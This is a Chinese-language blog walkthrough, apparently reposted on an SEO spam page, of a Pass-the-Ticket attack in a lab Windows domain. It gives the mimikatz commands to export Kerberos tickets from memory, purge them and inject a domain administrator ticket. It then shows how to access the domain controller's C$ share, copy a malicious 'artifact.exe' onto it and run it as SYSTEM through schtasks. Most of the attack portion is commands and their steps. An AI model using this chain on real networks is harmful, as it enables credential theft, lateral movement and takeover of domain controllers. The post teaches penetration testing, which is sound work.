当前位置: 首页 > news >正文

海南建设工程股份有限公司网站seo优化排名易下拉效率

海南建设工程股份有限公司网站,seo优化排名易下拉效率,用帝国cms做企业网站版权,david网站做go富集分析系列文章第一章节之基础知识篇 内网渗透(一)之基础知识-内网渗透介绍和概述 内网渗透(二)之基础知识-工作组介绍 内网渗透(三)之基础知识-域环境的介绍和优点 内网渗透(四)之基础知识-搭建域环境 内网渗透(五)之基础知识-Active Directory活动目录介绍和使用 内网渗透(六)之基…

系列文章第一章节之基础知识篇

内网渗透(一)之基础知识-内网渗透介绍和概述
内网渗透(二)之基础知识-工作组介绍
内网渗透(三)之基础知识-域环境的介绍和优点
内网渗透(四)之基础知识-搭建域环境
内网渗透(五)之基础知识-Active Directory活动目录介绍和使用
内网渗透(六)之基础知识-域中的权限划分和基本思想
内网渗透(七)之基础知识-企业常见安全域划分和结构
内网渗透(八)之基础知识-企业域中计算机分类和专业名

系列文章第二章节之内网信息收集篇

内网渗透(九)之内网信息收集-手动本地信息收集
内网渗透(十)之内网信息收集-编写自动化脚本收集本地信息
内网渗透(十一)之内网信息收集-内网IP扫描和发现
内网渗透(十二)之内网信息收集-内网端口扫描和发现
内网渗透(十三)之内网信息收集-收集域环境中的基本信息
内网渗透(十四)之内网信息收集-域环境中查找域内用户基本信息
内网渗透(十五)之内网信息收集-域环境中定位域管理员
内网渗透(十六)之内网信息收集-powershell基础知识
内网渗透(十七)之内网信息收集-powershell收集域内信息和敏感数据定位

系列文章第三章节之Windows协议认证和密码抓取篇

内网渗透(十八)之Windows协议认证和密码抓取-本地认证(NTML哈希和LM哈希)
内网渗透(十九)之Windows协议认证和密码抓取-网络认证(基于挑战响应认证的NTLM协议)
内网渗透(二十)之Windows协议认证和密码抓取-域认证(Kerberos协议)
内网渗透(二十一)之Windows协议认证和密码抓取-Golden Ticket黄金票据制作原理及利用方式
内网渗透(二十二)之Windows协议认证和密码抓取-Silver Ticket白银票据制作原理及利用方式
内网渗透(二十三)之Windows协议认证和密码抓取-Mimikatz介绍和各种模块使用方法
内网渗透(二十四)之Windows协议认证和密码抓取-Mimikatz读取sam和lsass获取密码
内网渗透(二十五)之Windows协议认证和密码抓取-使用Hashcat和在线工具破解NTLM Hash
内网渗透(二十六)之Windows协议认证和密码抓取-浏览器、数据库等其他密码的抓取
内网渗透(二十七)之Windows协议认证和密码抓取-Windows其他类型抓取NTLM HASH工具
内网渗透(二十八)之Windows协议认证和密码抓取-Windows RDP凭证的抓取和密码破解
内网渗透(二十九)之Windows协议认证和密码抓取-Windows-2012R2之后抓取密码的方式和抓取密码的防范措施

系列文章第四章节之横向移动篇

内网渗透(三十)之横向移动篇-利用远控工具向日葵横向移动
内网渗透(三十一)之横向移动篇-利用远控工具todesk横向移动
内网渗透(三十二)之横向移动篇-利用远控工具GoToHTTP横向移动
内网渗透(三十三)之横向移动篇-利用远控工具RustDESK横向移动
内网渗透(三十四)之横向移动篇-IPC配合计划任务横向移动
内网渗透(三十五)之横向移动篇-IPC配合系统服务横向移动
内网渗透(三十六)之横向移动篇-Password Spraying密码喷洒攻击和域内用户枚举横向移动
内网渗透(三十七)之横向移动篇-Pass the Hash 哈希传递攻击(PTH)横向移动
内网渗透(三十八)之横向移动篇-pass the key 密钥传递攻击(PTK)横向攻击

注:阅读本编文章前,请先阅读系列文章,以免造成看不懂的情况!

pass the ticket 票据传递攻击(PTT)横向攻击

票据传递介绍

要想使用mimikatz的哈希传递功能,必须具有本地管理员权限。 mimikatz同样提供了不需要本地管理员权限进行横向渗透测试的方法

例如票据传递( PassThe Ticket,PTT)

票据传递是基于kerberos认证的一种攻击方式,常用来做后渗透权限维持。

黄金票据攻击利用的前提是得到了域内krbtgt用户的NTLM哈希或AES-256的值。

白银票据攻击利用的前提是得到了域内服务账号的HTML哈希或AES-256的值。

票据传递攻击一般分为两种

1、自己制作票据
2、传递内存中的票据

实验复现

实验环境

机器名登录用户IP
Windows server 2012(域控)administrator(域管理员)192.168.41.10
windows server 2012-2(域内主机)administrator(本地管理员)192.168.41.15

首先我们通过木马或者钓鱼等各种方法拿下windows server 2012-2主机的权限

在这里插入图片描述

然后我们导出机器内存中的票据

mimikatz sekurlsa::tickets /export

在这里插入图片描述
执行以上命令后,会在当前目录下出现多个服务的票据文件,例如krbtgt、cifs、ldap等。

在这里插入图片描述

我们很幸运的导出了一张域管理员用户的高权限票据

清除内存中的票据

shell klist purge
mimikatz kerberos::purge
//两个都是清除票据

在这里插入图片描述

将高权限的票据文件注入内存

mimikatz kerberos::ptt [0;24a93]-2-0-40e10000-Administrator@krbtgt-HACK.COM.kirbi

在这里插入图片描述

查看票据

shell klist
mimikatz kerberos::tgt
//两个都是查看票据

在这里插入图片描述
访问机器

dir \\dc.hack.com\C$

在这里插入图片描述

现在由于我们有了域管理员权限的高权限票据,导致可以让我们访问域控了,接下来就是利用IPC配合计划任务上线域控了

在这里插入图片描述

这个artifact.exe就是我们要拷贝的恶意程序,他被我们放置在Windows 2012-2主机上

拷贝恶意程序到域控上

copy artifact.exe \\dc.hack.com\C$

在这里插入图片描述

schtasks命令创建计划任务:

schtasks /create /s IP地址 /tn 计划任务名 /sc onstart /tr c:\文件 /ru system /f

在这里插入图片描述

schtasks命令执行计划任务:

schtasks /run /s IP地址 /i /tn "计划任务名"

在这里插入图片描述

目标机器域控成功上线

在这里插入图片描述

http://www.hrbkazy.com/news/27671.html

相关文章:

  • 网站备案是否关闭郑州搜索引擎优化公司
  • 质量好网站建设商家网站网络推广推广
  • wifi扩展器做网站现在百度推广有用吗
  • 猪八戒设计网站如何做兼职广州百度seo代理
  • 深圳建设网站top028google收录查询
  • 网站建设微信运营推广新手怎么做网络推广
  • 网页制作与前端开发西安优化网站公司
  • 苏州吴江建设局招投标网站标题优化
  • 闲置服务器做网站挣钱黑科技引流工具
  • 陇南市响应式网站建设惊艳的网站设计
  • 闲鱼做网站靠谱吗网络推广长沙网络推广
  • wordpress指定id文章seo做关键词怎么收费的
  • 郑州网站建设三猫网络免费推广方法
  • 营销策划书怎么写格式芭嘞seo
  • 清河县做网站故事式的软文广告例子
  • 贵阳58同城做网站最牛餐饮营销手段
  • 建设云购网站搜一搜排名点击软件
  • 小说网站开发环境那个号东莞网站制作公司联系方式
  • 找做牙工作上哪个网站网站下载
  • 上海长城建设有限公司网站比百度强大的搜索引擎
  • 政府网站集约化建设存在的问题百度自己的宣传广告
  • 福田做网站报价外包网站
  • 做投标网站条件百度门店推广
  • 杭州 做网站广州谷歌优化
  • 新手学做网站代码太原百度推广排名优化
  • 网站开发外包费用的会计分录保定seo外包服务商
  • python18前端seo是什么意思
  • 用模版做网站的好处和坏处网站广告费一般多少钱
  • 建筑建材网站设计费用快速排名网站
  • 企业推广类网站杭州seo网站哪家好